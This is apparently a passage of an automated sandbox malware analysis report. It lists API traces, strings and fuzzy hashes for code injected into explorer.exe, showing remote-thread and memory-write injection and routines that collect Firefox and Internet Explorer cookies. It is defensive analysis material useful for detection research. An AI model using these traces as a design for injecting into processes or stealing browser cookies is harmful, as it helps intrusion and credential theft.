Part of subcall function 015618F0: NtAllocateVirtualMemory.NTDLL(01561006,00000000,00000000,01561006,00003000,00000040), ref: 01561921
Part of subcall function 015618F0: RtlNtStatusToDosError.NTDLL(00000000), ref: 01561928
Part of subcall function 015618F0: SetLastError.KERNEL32(00000000), ref: 0156192F

Part of subcall function 01561877: RtlNtStatusToDosError.NTDLL(00000000), ref: 0156188F

memcpy.NTDLL(00000218,0156CD21,00000100,?,00010003,?,?,00000318,00000008), ref: 01561059
NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 015610B0
RtlNtStatusToDosError.NTDLL(00000000), ref: 015610B3

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Error$Status$Last$AllocateContextMemoryThreadVirtualmemcpymemset
String ID:
API String ID: 3509679446-0
Opcode ID: 0b50271653470e84cf29d66cc682627e01561c031e4c567afe12b0a650b5bba4
Instruction ID: baa27a00afa8b58ca376d9f4a22f33d247af06fd69519de3149457e187311d8f
Opcode Fuzzy Hash: 0b50271653470e84cf29d66cc682627e01561c031e4c567afe12b0a650b5bba4
Instruction Fuzzy Hash: 78318E71A0060AAFDF20DF68C9C5AAEB7FCFF44354F10456AE556DB241EB30EA448B91

Uniqueness

Uniqueness Score: -1,00%

Function 015A0248, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
nativelibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 015A02D9
NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 015A03D5
NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 015A043F

Strings

z, xrefs: 015A0381

Memory Dump Source

Source File: 00000002.00000002.1544242491.015A0000.00000040.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15a0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual$Load
String ID: z
API String ID: 3215406092-1657960367
Opcode ID: 4e61c5fe06dccb3eaa1a0d4f01e448bc88c06786eaff52d5f7fd7f16fa89b49f
Instruction ID: 11bfb442b54568057a8927271179445e2ac915bdb03f8ba7108ac4734743b5b3
Opcode Fuzzy Hash: 4e61c5fe06dccb3eaa1a0d4f01e448bc88c06786eaff52d5f7fd7f16fa89b49f
Instruction Fuzzy Hash: 8271D172A50206EFDB10CF58C880AEFBBB6FF84304F54855AE516DB281E730EA85CB50

Uniqueness

Uniqueness Score: -1,00%

Function 0156BF7B, Relevance: 6.1, APIs: 4, Instructions: 79
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 0156BFD6
memset.NTDLL ref: 0156BFFB
RtlNtStatusToDosError.NTDLL(00000000), ref: 0156C017
NtClose.NTDLL(?), ref: 0156C02B

Part of subcall function 0156BF3C: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 0156BF69
Part of subcall function 0156BF3C: RtlNtStatusToDosError.NTDLL(00000000), ref: 0156BF70

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorSectionStatus$CloseCreateViewmemset
String ID:
API String ID: 783833395-0
Opcode ID: d24361cfce46b323071a65f4b8b1bd8436292a03fc33a5ddb83e1dd6c8120f16
Instruction ID: 6716fe15b72dd4468e2950d2d2b4a2df83e0d83e02eb39c10078e77db2eaae47
Opcode Fuzzy Hash: d24361cfce46b323071a65f4b8b1bd8436292a03fc33a5ddb83e1dd6c8120f16
Instruction Fuzzy Hash: 6921487190022AAFCB11CFA8CC459EEBBBDFB48760F100516FA11EB250D7709A448BE1

Uniqueness

Uniqueness Score: -1,00%

Function 015618F0, Relevance: 4.5, APIs: 3, Instructions: 29
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(01561006,00000000,00000000,01561006,00003000,00000040), ref: 01561921
RtlNtStatusToDosError.NTDLL(00000000), ref: 01561928
SetLastError.KERNEL32(00000000), ref: 0156192F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 2d97a6beed87299d80c176292e0b1fb65b93df1129c0cb35ccb76c87e955bb78
Instruction ID: d41da495e82288e9a380e4055d63766e956f1c6190467cb4fab68de7f3bba74d
Opcode Fuzzy Hash: 2d97a6beed87299d80c176292e0b1fb65b93df1129c0cb35ccb76c87e955bb78
Instruction Fuzzy Hash: 74F0FEB5511309FBEB15CB95D94ABAE7BBCEB54705F104048F600AB180EBB4EB04DBA5

Uniqueness

Uniqueness Score: -1,00%

Function 0156BF3C, Relevance: 3.0, APIs: 2, Instructions: 28
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 0156BF69
RtlNtStatusToDosError.NTDLL(00000000), ref: 0156BF70

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorSectionStatusView
String ID:
API String ID: 1313840181-0
Opcode ID: 8b9c9a618f9507d122674121c3185352d30d47d6cbccea80203c47b95bc1124a
Instruction ID: 4d24be8d2ea1393f96acedde8b9cec88ebec16a7fa0d7234edd01aa040aae62a
Opcode Fuzzy Hash: 8b9c9a618f9507d122674121c3185352d30d47d6cbccea80203c47b95bc1124a
Instruction Fuzzy Hash: 10E0C0B6900208BFEF059F94DD0BDDF7B7DEB44300F00856AF615A6154EAB0AA199B61

Uniqueness

Uniqueness Score: -1,00%

Function 015618C4, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,01561094,00000000,?,01561094,?,00000000,00000000,00000318,00000010,?,00010003,?), ref: 015618E2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 5a391fae3704cdf265b86e488d2918ccf91742f8056958c70adbcb7f80de1a4f
Instruction ID: e2f805074b676d5faff0d67fde2f5d82e9b5aa855423c975538d850d4a583d1e
Opcode Fuzzy Hash: 5a391fae3704cdf265b86e488d2918ccf91742f8056958c70adbcb7f80de1a4f
Instruction Fuzzy Hash: 1CD0423260062AAB9F125ED9DC4099A7BADBB48690B014025BF15D6120D672D921ABE5

Uniqueness

Uniqueness Score: -1,00%

Function 01561898, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,00000004,?,?,0156E0D8,?,?,0156B821,0156E0D8,?,?,00000004,?,00000000,0156E0D8,00000000), ref: 015618B6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 521fe0d019a7bd38f12f4bb10dd1a33659710d3be75fd5cceddcb1432317dc5d
Instruction ID: 67253dfec17a64b3775a5bd2e489e6a87cb455bfdfaf014c13ff20708c6534e1
Opcode Fuzzy Hash: 521fe0d019a7bd38f12f4bb10dd1a33659710d3be75fd5cceddcb1432317dc5d
Instruction Fuzzy Hash: 02D0173220022FBBAF024ED89D00DDA7FADBB48680B004121BF14C6120D732D832ABE0

Uniqueness

Uniqueness Score: -1,00%

Function 0156B8F3, Relevance: 12.1, APIs: 8, Instructions: 75
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?), ref: 0156B917
GetLastError.KERNEL32(?,?), ref: 0156B9AE

Part of subcall function 01560983: GetModuleHandleA.KERNEL32(0159A000,0159B0B4,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A2
Part of subcall function 01560983: GetProcAddress.KERNEL32(00000000,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A9
Part of subcall function 01560983: OpenProcess.KERNEL32(00000400,00000000,0156B7E1,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609C6
Part of subcall function 01560983: IsWow64Process.KERNELBASE(0156E0D8,00000000,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609D7
Part of subcall function 01560983: CloseHandle.KERNELBASE(0156E0D8), ref: 015609EA

GetModuleHandleA.KERNEL32(0159A8AE,0159B21E,00000000,?,?), ref: 0156B94F
GetProcAddress.KERNEL32(00000000,?,?), ref: 0156B956
CreateRemoteThread.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,?), ref: 0156B971
CloseHandle.KERNELBASE(00000000,?,00000000,00000000,?,?), ref: 0156B993
GetLastError.KERNEL32(?,?), ref: 0156B997
CloseHandle.KERNELBASE(?,?,?), ref: 0156B9AA

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Handle$CloseProcess$AddressErrorLastModuleOpenProc$CreateRemoteThreadWow64
String ID:
API String ID: 394107883-0
Opcode ID: 3154535a8bf8a5d9b082bc348e95b9ec6818db4463855c2ad81150970f9cbbc7
Instruction ID: 0739809e6aea7f208d8e4b384f931e7d82ae950d4f24ab27007a72d6decc835f
Opcode Fuzzy Hash: 3154535a8bf8a5d9b082bc348e95b9ec6818db4463855c2ad81150970f9cbbc7
Instruction Fuzzy Hash: 9E11DE71605225ABE721AA68DC4995FBEADFB493A0F050928F914DB164DB608808C7E3

Uniqueness

Uniqueness Score: -1,00%

Function 0156B7A2, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0156B7C5

Part of subcall function 01560983: GetModuleHandleA.KERNEL32(0159A000,0159B0B4,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A2
Part of subcall function 01560983: GetProcAddress.KERNEL32(00000000,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A9
Part of subcall function 01560983: OpenProcess.KERNEL32(00000400,00000000,0156B7E1,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609C6
Part of subcall function 01560983: IsWow64Process.KERNELBASE(0156E0D8,00000000,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609D7
Part of subcall function 01560983: CloseHandle.KERNELBASE(0156E0D8), ref: 015609EA

Sleep.KERNELBASE(00000064,?,0156E0D8,?,CCCCFEEB,0156E0D8,?,?,00000004,?,00000000,0156E0D8,00000000,00000000), ref: 0156B855
GetExitCodeProcess.KERNEL32(?,?), ref: 0156B871
GetLastError.KERNEL32(0156E0D8,?,?,00000004,?,00000000,0156E0D8,00000000,00000000), ref: 0156B8BB

Strings

d, xrefs: 0156B877

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Process$Handle$AddressCloseCodeErrorExitLastModuleOpenProcSleepWow64memset
String ID: d
API String ID: 1697550846-2564639436
Opcode ID: 254b9151927ad8b1adfc2d6faf7f2967900dc7ac94f15f583c6245db1326c281
Instruction ID: 9ffd868e2eb53ba4328187473f2202dfadeb3e84412ab6b5d5e8380e9d260b65
Opcode Fuzzy Hash: 254b9151927ad8b1adfc2d6faf7f2967900dc7ac94f15f583c6245db1326c281
Instruction Fuzzy Hash: 4D416271A0020AAFEF21AFA8CC849AE7BBDFF44214F004529F625EB190D7718955DBD1

Uniqueness

Uniqueness Score: -1,00%

Function 01560983, Relevance: 7.5, APIs: 5, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(0159A000,0159B0B4,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A2
GetProcAddress.KERNEL32(00000000,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609A9
OpenProcess.KERNEL32(00000400,00000000,0156B7E1,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609C6
IsWow64Process.KERNELBASE(0156E0D8,00000000,0156E0D8,?,?,?,0156B7E1,00000000,0156E0D8,00000000,00000000), ref: 015609D7
CloseHandle.KERNELBASE(0156E0D8), ref: 015609EA

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: HandleProcess$AddressCloseModuleOpenProcWow64
String ID:
API String ID: 4157061983-0
Opcode ID: 16b5c3e6c2819df83e1a463937b07240dea2c8700dc5d9bcbadbf7df41328f38
Instruction ID: 0a5f1cd81d499d55ec326691b99c880ff2139995a2860189d342e1835b3345ef
Opcode Fuzzy Hash: 16b5c3e6c2819df83e1a463937b07240dea2c8700dc5d9bcbadbf7df41328f38
Instruction Fuzzy Hash: 9B01F231800214EBAF31DF6AD80989EBAADFB80251B12411AFA10DB144E3308A41EBE1

Uniqueness

Uniqueness Score: -1,00%

Function 0156B07A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(0159A8AE,?,0156BD07,0156B370,0156BD07), ref: 0156B0AD
memcpy.NTDLL(?,3!|w,00000018,0159B1D8,0159B1FA,0159B1EF), ref: 0156B118

Strings

Zzw, xrefs: 0156B098, 0156B0FC
3!|w, xrefs: 0156B07A, 0156B0C4, 0156B10F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: HandleModulememcpy
String ID: 3!|w$Zzw
API String ID: 1801490239-521515745
Opcode ID: 3baac90b4e16e6cfe905761b6e0a5d88dca1242eec168b513db5e4a2ecd90524
Instruction ID: 05bc98edbc7b5e204d396f20081ba061022d97b7abb277219095f5646bbcee43
Opcode Fuzzy Hash: 3baac90b4e16e6cfe905761b6e0a5d88dca1242eec168b513db5e4a2ecd90524
Instruction Fuzzy Hash: 800180F1741201BBA734DF2AA80696D3BA5F7D8614B0B692DF128CF294D7319408A7B7

Uniqueness

Uniqueness Score: -1,00%

Function 015609F9, Relevance: 6.1, APIs: 4, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01561458: GetModuleFileNameW.KERNEL32(0000007F,00000000,00000104,00000208,00000000,00000000,?,?,01560A13,00000000), ref: 0156147E

Part of subcall function 015634DA: lstrcmp.KERNEL32(?,0000007F), ref: 0156358B

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01560A4D
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,01541C3F,000000FF), ref: 01560A5F
ReadFile.KERNELBASE(?,?,00000004,?,00000000), ref: 01560A77
CloseHandle.KERNELBASE(?), ref: 01560A92

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CloseCreateHandleModuleNamePointerReadlstrcmp
String ID:
API String ID: 3110218675-0
Opcode ID: 5cdcf9de2400c861f0a599309e2fa08616e6e31be6daf34d446fef2e69147af7
Instruction ID: 6ddb670d8d833117dadfc947041d5c310eba9c8fd27c4163ada99ff9399ed935
Opcode Fuzzy Hash: 5cdcf9de2400c861f0a599309e2fa08616e6e31be6daf34d446fef2e69147af7
Instruction Fuzzy Hash: 37118171A0111ABBEF21AB69CC89EEFBE6DFF41690F104125F515EB090D7B08A44D7E0

Uniqueness

Uniqueness Score: -1,00%

Function 0156198E, Relevance: 4.5, APIs: 3, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(0159B638,0159B617), ref: 015619A1
GetProcAddress.KERNEL32(00000000), ref: 015619A8
FindWindowA.USER32(0159B630,00000000), ref: 015619BB

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: AddressFindHandleModuleProcWindow
String ID:
API String ID: 554549032-0
Opcode ID: 476444f0559fc5d8a0f9ed4ff6039db6bb29820de49eb358eeeb3e5aaf13b15e
Instruction ID: 874eecb3e8138ef3edef108b80d1e6682bd112403c3d984942651ff1dac80626
Opcode Fuzzy Hash: 476444f0559fc5d8a0f9ed4ff6039db6bb29820de49eb358eeeb3e5aaf13b15e
Instruction Fuzzy Hash: 35E09275A51218B7EF209BA9EC0AFAE3EACFB00A54F010108F501AB040DBB0A9049BE1

Uniqueness

Uniqueness Score: -1,00%

Function 0156AF34, Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,?,00000000,?,?,?,0156B840,0156E0D8,?,CCCCFEEB,0156E0D8,?), ref: 0156AF51

Part of subcall function 015618C4: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,01561094,00000000,?,01561094,?,00000000,00000000,00000318,00000010,?,00010003,?), ref: 015618E2

VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,?,00000004,?,?,?,?,0156B840,0156E0D8,?), ref: 0156AF85

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Virtual$Protect$MemoryWrite
String ID:
API String ID: 159175985-0
Opcode ID: c673ee5df9a8c654124b3fcfcc79863d65768cb3be161efe1fe2ea4b915d7a8d
Instruction ID: e7ffffaddf6aad091a41cff3b21d63bb6ee952109bef6e9f5eee770e99fa608b
Opcode Fuzzy Hash: c673ee5df9a8c654124b3fcfcc79863d65768cb3be161efe1fe2ea4b915d7a8d
Instruction Fuzzy Hash: 27F0FFB660020DBFEF128F94CC41EEEBB6DFB04654F008025FB14AA090D371DA559BA1

Uniqueness

Uniqueness Score: -1,00%

Function 015415A9, Relevance: 3.0, APIs: 2, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 015415B2
GetTickCount.KERNEL32 ref: 015415C6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 1f8d2ba703dd1370d37380713b15d2ac7704a6a3026dfdf64837b79314d1a00e
Instruction ID: 46d0e78ebc39b7d2a5c05455be1ac003c4e29dc68da301bc4e34a7eb45e602cd
Opcode Fuzzy Hash: 1f8d2ba703dd1370d37380713b15d2ac7704a6a3026dfdf64837b79314d1a00e
Instruction Fuzzy Hash: E2F089345007035BEB71AF35DD41B1D36D57F90788F054435E914DE195E770E888E796

Uniqueness

Uniqueness Score: -1,00%

Function 015634DA, Relevance: 2.6, APIs: 2, Instructions: 103stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(?,0000007F), ref: 0156358B
lstrlen.KERNEL32(?,00000000,?,00000000), ref: 01563596

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: lstrcmplstrlen
String ID:
API String ID: 898299967-0
Opcode ID: 0ff3810835db4867bd98671a918e5e2b65224f4f77914a1387d2bfda9d7e6d12
Instruction ID: 07c9e377d2d4563ccd0d8d1383f43f8ef27976a2d73434f1fa89484d2718729c
Opcode Fuzzy Hash: 0ff3810835db4867bd98671a918e5e2b65224f4f77914a1387d2bfda9d7e6d12
Instruction Fuzzy Hash: CB413A71A00205DFEB64CF58C885ABEBBF9FF54345F18846AD8199F241E734EA44CB90

Uniqueness

Uniqueness Score: -1,00%

Function 015610E1, Relevance: 1.3, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

memset.NTDLL ref: 01561100

Part of subcall function 01560E66: memset.NTDLL ref: 01560E8C
Part of subcall function 01560E66: memcpy.NTDLL ref: 01560EB4
Part of subcall function 01560E66: GetLastError.KERNEL32(00000010,00000218,0156CCFC,00000100,?,00000318,00000008), ref: 01560ECB
Part of subcall function 01560E66: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0156CCFC,00000100), ref: 01560FAE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: 6e3ba6321fee28268de58b7dd0a19bbc2e3295aa82ffa20282370a2028dbcd37
Instruction ID: 8df30368d5efed80b6cb17bd71121272d91d55c4737826f75fe65eb38d7ed994
Opcode Fuzzy Hash: 6e3ba6321fee28268de58b7dd0a19bbc2e3295aa82ffa20282370a2028dbcd37
Instruction Fuzzy Hash: 7101D67190170AABD3219F28DC84B9B7BECFBC5614F00852AF8548F240D770E94587E0

Uniqueness

Uniqueness Score: -1,00%

Function 00640000, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544088020.00640000.00000040.sdmp, Offset: 00640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_640000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c91aba9cd9c4de111ead653da9b8b73a930ca1f905d94f2b530902d0a0968a
Instruction ID: aca5046cff921ab13a964a26233faf31e062cfe4c560167db7de1dfaef7b2dd7
Opcode Fuzzy Hash: c4c91aba9cd9c4de111ead653da9b8b73a930ca1f905d94f2b530902d0a0968a
Instruction Fuzzy Hash: 9FD06C7518E3C14FC3078B209821895BFB1AF8722070B86D7D4858F1BBC22D9889E722

Uniqueness

Uniqueness Score: -1,00%

Non-executed Functions

Function 01541FF9, Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 277memorystringfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0000020A), ref: 01542017
TerminateProcess.KERNEL32(00000000,00000000,0156E450), ref: 01542062
CloseHandle.KERNEL32(00000000), ref: 01542069
FindFirstFileW.KERNEL32 ref: 015420AB
lstrlenW.KERNEL32(00000000), ref: 015420B6
RtlAllocateHeap.NTDLL(00000000,0000020A), ref: 015420D8
lstrcpyW.KERNEL32(00000000,00000000), ref: 015420EA
lstrcpyW.KERNEL32(00000000,00000000), ref: 01542116
DeleteFileW.KERNEL32(00000000,00000000), ref: 01542137
FindNextFileW.KERNEL32(?,00000000), ref: 01542146
FindClose.KERNEL32(000000FF), ref: 01542154
FindFirstFileW.KERNEL32(00000000,00000000), ref: 01542194
lstrlenW.KERNEL32(00000000), ref: 0154219F
RtlAllocateHeap.NTDLL(00000000,0000020A), ref: 015421C1
lstrcpyW.KERNEL32(00000000,00000000), ref: 015421FF

Part of subcall function 0156048A: RemoveDirectoryW.KERNEL32(?), ref: 01560583
Part of subcall function 0156048A: DeleteFileW.KERNEL32(?), ref: 0156058E
Part of subcall function 0156048A: FindNextFileW.KERNEL32(?,00000000), ref: 015605A1

lstrcpyW.KERNEL32(00000000,00000000), ref: 015421D3

Part of subcall function 01560766: GetFileAttributesW.KERNEL32(?,01542298,00000000), ref: 0156076A

FindNextFileW.KERNEL32(?,00000000), ref: 01542232
FindClose.KERNEL32(000000FF), ref: 01542240
HeapFree.KERNEL32(00000000,00000000), ref: 0154224E
RtlAllocateHeap.NTDLL(00000000,0000020A), ref: 0154227A
lstrcpyW.KERNEL32(00000000,00000000), ref: 01542284
TerminateProcess.KERNEL32(00000000,00000000,0156E540,00000000), ref: 015422A3
CloseHandle.KERNEL32(?), ref: 015422AD
HeapFree.KERNEL32(00000000,00000000), ref: 01542162

Part of subcall function 0156048A: FindFirstFileW.KERNEL32(?,00000000), ref: 01560509
Part of subcall function 0156048A: FindClose.KERNEL32(?,00000208), ref: 015605C8

lstrcpyW.KERNEL32(00000000,00000000), ref: 015422D1
DeleteFileW.KERNEL32(00000000,00000000), ref: 015422EA
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 015422F8
HeapFree.KERNEL32(00000000,00000000), ref: 01542306

Strings

., xrefs: 015421C9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$Find$Heap$lstrcpy$Close$AllocateFree$DeleteFirstNext$HandleProcessTerminatelstrlen$AttributesDirectoryRemove
String ID: .
API String ID: 2492722513-248832578
Opcode ID: 620a44fc6dba5b6b486dc5dbf01ebf1fbac8d6bab8448af8db678768960e9bd7
Instruction ID: f9cde0fba4e468f7fac0c0c74b924c96ff38923cddf781a903bd79b820bbe539
Opcode Fuzzy Hash: 620a44fc6dba5b6b486dc5dbf01ebf1fbac8d6bab8448af8db678768960e9bd7
Instruction Fuzzy Hash: D181C43410131ABFE630BB35AC4AE6F3EADFF44755F020414FA1A9E095DAB59848DBB1

Uniqueness

Uniqueness Score: -1,00%

Function 01541E2E, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(%APPDATA%), ref: 01541E46

Part of subcall function 01560022: memset.NTDLL ref: 015600C2
Part of subcall function 01560022: FindFirstFileW.KERNEL32(00000000,00000000), ref: 015600DD
Part of subcall function 01560022: memset.NTDLL ref: 01560140
Part of subcall function 01560022: wcscpy.NTDLL ref: 01560152

Part of subcall function 01560022: RtlEnterCriticalSection.NTDLL(?), ref: 015601AD
Part of subcall function 01560022: RtlLeaveCriticalSection.NTDLL(?), ref: 015601C9
Part of subcall function 01560022: FindNextFileW.KERNEL32(?,00000000), ref: 015601E2
Part of subcall function 01560022: WaitForSingleObject.KERNEL32(00000000), ref: 015601F4
Part of subcall function 01560022: FindClose.KERNEL32(?), ref: 01560209
Part of subcall function 01560022: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0156021D

RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 01541E91
mbstowcs.NTDLL ref: 01541EA4
lstrcatW.KERNEL32(00000000,0159A7EC), ref: 01541EB3

Part of subcall function 01560022: FindNextFileW.KERNEL32(?,00000000), ref: 015602B5
Part of subcall function 01560022: WaitForSingleObject.KERNEL32(00000000), ref: 015602C7
Part of subcall function 01560022: FindClose.KERNEL32(?), ref: 015602E2

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01541ED7
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 01541EE9
lstrcatW.KERNEL32(00000000,0156E44C), ref: 01541F0B
HeapFree.KERNEL32(00000000,00000000), ref: 01541F2F
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 01541F55
DeleteFileW.KERNEL32(?), ref: 01541FA4
HeapFree.KERNEL32(00000000,?), ref: 01541FB2
HeapFree.KERNEL32(00000000,?), ref: 01541FCE

Strings

\sols, xrefs: 01541F87
\cookie.ff, xrefs: 01541F79
\cookie.ie, xrefs: 01541F80
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 01541E5E, 01541E63, 01541E79
%APPDATA%, xrefs: 01541E3A, 01541E3F, 01541EA2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

